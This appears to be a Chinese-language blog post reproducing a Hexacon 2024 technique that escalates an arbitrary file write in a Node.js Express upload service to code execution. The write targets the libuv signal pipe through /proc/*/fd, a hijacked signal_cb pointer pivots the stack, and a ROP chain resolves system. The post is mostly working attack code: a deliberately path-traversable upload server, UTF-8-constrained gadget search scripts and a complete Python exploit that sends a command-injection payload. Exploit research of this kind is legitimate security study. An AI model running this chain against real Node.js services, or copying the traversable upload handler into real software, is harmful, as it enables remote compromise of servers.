…
TL; DR在 Hexacon 2024 上关注到了这么一个议题 《Exploiting File Writes in Hardened Environments - From HTTP Request to ROP Chain in Node.js 》, 同时该作者发了一个简单的 Blog 讲述了下这个原理以及部分细节。[1] 这里简单快速复现一下。
环境1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 const express = require('express'); const fs = require('fs'); const path = require('path'); const app = express(); app.use(express.json()); app.post('/upload', (req, res) => { const { filename, content } = req.body; if (!filename || !content) { return res.status(400).json({ message: 'Filename and content are required!' }); } const filePath = path.join(__dirname, 'uploads', filename); fs.writeFile(filePath, content, (err) => { if (err) { return res.status(500).json({ message: 'Error saving file!' }); } res.json({ message: 'File uploaded successfully!', path: filePath }); }); }); app.listen(3000, () => { console.log('Server running on http://localhost:3000'); });
按照文章的描述, 我们先随便构造一个可以任意文件写的 nodejs 服务 (在假设环境是readonly 的情况下)
Exploit按照文章的描述, nodejs 使用了 libuv
的这么一个库, 这个库在初始化的时候会的打开一个 Pipe 管道, 作者通过审计的时候发现有一个函数 uv__signal_event
[2]
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 static void uv__signal_event (uv_loop_t * loop, uv__io_t * w, unsigned int events) { uv__signal_msg_t * msg; uv_signal_t * handle; char buf[sizeof (uv__signal_msg_t ) * 32 ]; size_t bytes, end, i; int r; bytes = 0 ; end = 0 ; do { r = read(loop->signal_pipefd[0 ], buf + bytes, sizeof (buf) - bytes); if (r == -1 && errno == EINTR) continue ; ... end = (bytes / sizeof (uv__signal_msg_t )) * sizeof (uv__signal_msg_t ); for (i = 0 ; i < end; i += sizeof (uv__signal_msg_t )) { msg = (uv__signal_msg_t *) (buf + i); handle = msg->handle; if (msg->signum == handle->signum) { assert(!(handle->flags & UV_HANDLE_CLOSING)); handle->signal_cb(handle, handle->signum); } handle->dispatched_signals++; if (handle->flags & UV_SIGNAL_ONE_SHOT) uv__signal_stop(handle); }
在这个函数中, 从 loop->signal_pipefd[0]
读内容, 然后做一个 signum检查, 就会使用传过来的数据解引用出来一个函数指针,然后直接调用
1 2 3 4 5 6 handle = msg->handle; if (msg->signum == handle->signum) { assert(!(handle->flags & UV_HANDLE_CLOSING)); handle->signal_cb(handle, handle->signum); }
uv__signal_msg_t数据结构仅包含两个成员,一个句柄指针和一个称为signum的整数:
1 2 3 4 typedef struct { uv_signal_t * handle; int signum; } uv__signal_msg_t ;
在这个 Pipe 是可 uv__make_pipe
函数创建的, 在 Docker 容器中是fd 为 11 的描述符
当然这个fd num 值更好的判断就是下一个断点, 然后简单通过 echo 发点数据就能确认 ( 不要在真实机器上测试, 会把一些 lib 写坏掉)
Overview Data Structure
对于我们来说, 我们有一个任意文件写入的方法, 我们通过这个方法往 Pipe 中写入我们构造的数据, 我们要构造的数据如上
发送过来的数据包含两个部分, 一个是 *handle
指针, 和 signum
, 其中 *handle
指针指向的数据包含两个部分
我们要构造 uv_signal_msg_t
的 signum
和 uv_signal_s
结构体中的 signum
相等, 才会调用 signal_cb
, 并且, 由于我们构造的这个场景是通过 fs.writeFile
函数写入内容的
用于写入文件的函数(本例中为 fs.writeFile)仅限于有效的 UTF-8 数据。因此,写入管道的所有数据都必须是有效的 UTF-8。
如果满足上述条件, 我们就可以劫持程序流,控制程序执行到我们想要的地方
Searching Data Structure Gadgets由于 FROM node:18@sha256:f910225c96b0f77b0149f350a3184568a9ba6cddba2a7c7805cc125a50591605
我们这个方式拉取的 node 程序本身是没有开PIE的
1 2 3 4 5 6 7 8 9 osboxes@osboxes:~$ checksec node [*] '/home/osboxes/node' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) Stripped: No Debuginfo: Yes
因此我们可以尝试在 node 程序中尝试找合适的 gadget。 我考虑到如果程序起来只有可能会有一些数据写在 bss 或者 data 段上, 因此我 search 的范围是将程序正常启动,然后 dump memory
由于执行到 signal_cb
的时候, 此时场景如下:
我们仅仅需要找几个 pop xxx , pop xxx, .* ret
的 gadget 就行, 那么代码思路如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 for addr, length in segments: for offset in range (length-4 ): handle = addr + offset if not is_valid_utf8(p64(handle-0x60 )): continue signum = read_mem(handle+8 , 4 ) if not is_valid_utf8(signum): continue ptr = read_mem(handle, 8 ) data = read_mem(u64(ptr), 30 ) if data is None : continue out = disasm(data, arch='amd64' , byte=False , offset=False ) if is_useful_gadget(out): print ('handle' ,hex (handle), '->' , 'ptr:' , u64(ptr), 'signum' , hex (u32(signum))) print (out)
首先从头开始遍历, 由于调用的callback 指针是从 handle+60h
获取的, 因此我们第一个要校验的 *handle
是要减去 0x60 的, 然后从 handle + 8
后取 4个字节, 作为signum ,判断这两者是否都符合 utf-8 编码, 如果是将这个指针读出来, 接着读取这个指针的指向的gadget , 这里假设 depth 为 30 , 然后尝试去反汇编, 然后判断这个 gadget 是不是符合 pop xxx , ret
的形式, 如果是将这些值打印出来。
我这里没有做更细致的处理,打印出来的 gadget 可能比较丑, 大概长这样
很幸运的是, 我的第一个 gadget 就是满足的, 且适合我用来做栈迁移的
1 2 3 4 5 6 7 8 9 root@osboxes:/home/osboxes handle 0x4261af -> ptr: 12048128(0xB7D700) signum 0xb7d900 pop r12 pop r13 pop r14 pop r15 pop rbp ret
那么此时我构造出来的数据就大致长这样
1 2 3 4 5 6 7 8 9 uv_signal_msg_t. .... *handle (0x4261af) --------> uv_signal_s signum (0xb7d900). ... *signal_cb(0xB7D700) : pop r12 ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret signum (0xb7d900) ...
1 2 content = p64(0x4261af - 0x60 ) content += p64(0xb7d900 )
这里贴下我完整的 search 脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 from pwn import *def is_valid_utf8 (byte_seq ): try : byte_seq.decode('utf-8' ) return True except UnicodeDecodeError: return False def read_mem (addr, size ): if 0x0000000000400000 < addr< 0x0000000004ff1000 : base = 0x0000000000400000 data = mem1[addr-base: addr+size-base] elif 0x00000000051f1000 < addr < 0x00000000051f4000 : base = 0x00000000051f1000 data = mem2[addr-base: addr+size-base] elif 0x00000000051f4000 < addr < 0x000000000520f000 : base = 0x00000000051f4000 data = mem3[addr-base: addr+size-base] else : return None return data def is_useful_gadget (out ): dis_list = out.split('\n' ) for n, x in enumerate (dis_list): if x == 'ret' : for _ in range (0 , n): if 'bad' in dis_list[_] : return False return True return False with open ("mem1" , "rb" ) as f: mem1 = f.read() with open ("mem2" , "rb" ) as f: mem2 = f.read() with open ("mem3" , "rb" ) as f: mem3 = f.read() segments = [(0x0000000000400000 , 0x0000000004ff1000 -0x0000000000400000 ), (0x00000000051f1000 , 0x00000000051f4000 -0x00000000051f1000 ), (0x00000000051f4000 , 0x000000000520f000 -0x00000000051f4000 )] for addr, length in segments: for offset in range (length-4 ): handle = addr + offset if not is_valid_utf8(p64(handle-0x60 )): continue signum = read_mem(handle+8 , 4 ) if not is_valid_utf8(signum): continue ptr = read_mem(handle, 8 ) data = read_mem(u64(ptr), 30 ) if data is None : continue out = disasm(data, arch='amd64' , byte=False , offset=False ) if is_useful_gadget(out): print ('handle' ,hex (handle), '->' , 'ptr:' , u64(ptr), 'signum' , hex (u32(signum))) print (out)
ROP Chain当能栈迁移后, 后面就是拼接 ROP chain的流程了, 由于程序本身没有 system 、 popen 等函数的调用 ,所以我没有法直接 ret2text, 我将我的思路简单定成如下:
找到一个 gadget 能从任意地址读取值, 然后赋值到某个寄存器上
找到一个gadget 能对可控的寄存器进行加减法运算
找到一个 libc 函数, 该函数与 system 的偏移满足 UTF-8 编码
首先通过 ROPchain 将所有可能能用的 gadget 输出成一个文件, 然后重新过滤下看哪些地址是符合 utf-8
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 from pwn import *def is_valid_utf8 (byte_seq ): try : byte_seq.decode('utf-8' ) return True except UnicodeDecodeError: return False lines = [ line.replace('\n' ,'' ) for line in open ('./gadgets' ,'r' ).readlines()] lines = list (filter (lambda line: ' : ' in line , lines)) lines = list (map (lambda line: line.split(' : ' ),lines)) result = list (filter (lambda l: is_valid_utf8(p64(int (l[0 ],16 ))),lines )) for i in result: print (i[0 ],' : ' ,i[1 ])
通过这个过滤,我找到了两条 gadget
1 2 0x0000000001097367 : add rax, rdx ; ret 0x0000000002176b34 : mov rax, qword ptr [rsi] ; ret
第i三个 libc 函数,我找到的是, setegid
, 它与system的偏移为 0xb1f30
符合 UTF-8
通过组合我们构造出如下 ropchain
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 content = p64(0x4261af - 0x60 ) + p64(0xb7d900 ) content += p64(pop_rdx_ret) content += p64(0x100 ) content += p64(add_rax_rdx_ret) content += p64(pop_rdx_ret) content += p64(pop_rsi_ret) content += p64(mov_rdi_rax_pop_rbp_jump_rdx) content += b'aaaaaaaa' content += p64(setegid_got) content += p64(mov_rax_qword_ptr_rsi_ret) content += p64(pop_rdx_ret) content += p64(0xb1f30 ) content += p64(sub_rax_rdx_ret) content += p64(0x0000000003adace7 ) content += b'a' *0x100 + b'; touch /tmp/hacked ; '
最后就可以执行任意命令了
完整 exploit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 from pwn import *import jsonimport requestsfrom urllib.parse import quotecontent = p64(0x4261af - 0x60 ) + p64(0xb7d900 ) + b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa' pop_rdi_ret = 0x0000000000427748 pop_rsi_ret = 0x0000000000433d27 pop_rdx_ret = 0x0000000001634a57 sub_rax_rdx_ret = 0x00000000017e7432 mov_rax_qword_ptr_rsi_ret = 0x0000000002176b34 mov_rdi_rax_pop_rbp_jmp_rdx = 0x000000000190ade9 mov_rbp_rsp_pop_rbp_ret = 0x0000000001b1da5d add_rax_rdx_ret = 0x0000000001097367 jump_rsp = 0x0000000000430657 mov_rdi_rax_pop_rbp_jump_rdx = 0x000000000190ade9 mprotect_plt = 0xa98eb0 setegid_got = 0x51f3f08 content = p64(0x4261af - 0x60 ) + p64(0xb7d900 ) content += p64(pop_rdx_ret) content += p64(0x100 ) content += p64(add_rax_rdx_ret) content += p64(pop_rdx_ret) content += p64(pop_rsi_ret) content += p64(mov_rdi_rax_pop_rbp_jump_rdx) content += b'aaaaaaaa' content += p64(setegid_got) content += p64(mov_rax_qword_ptr_rsi_ret) content += p64(pop_rdx_ret) content += p64(0xb1f30 ) content += p64(sub_rax_rdx_ret) content += p64(0x0000000003adace7 ) content += b'a' *0x100 + b'; touch /tmp/hacked ; ' a = content.decode('utf-8' ) print (f"content: {content} " )data = {'filename' :"../../../../proc/8/fd/11" ,"content" :content.decode('utf-8' )} resp = requests.post("http://localhost:3000/upload" ,data = json.dumps(data),headers = {"Content-Type" :"application/json" })
Reference link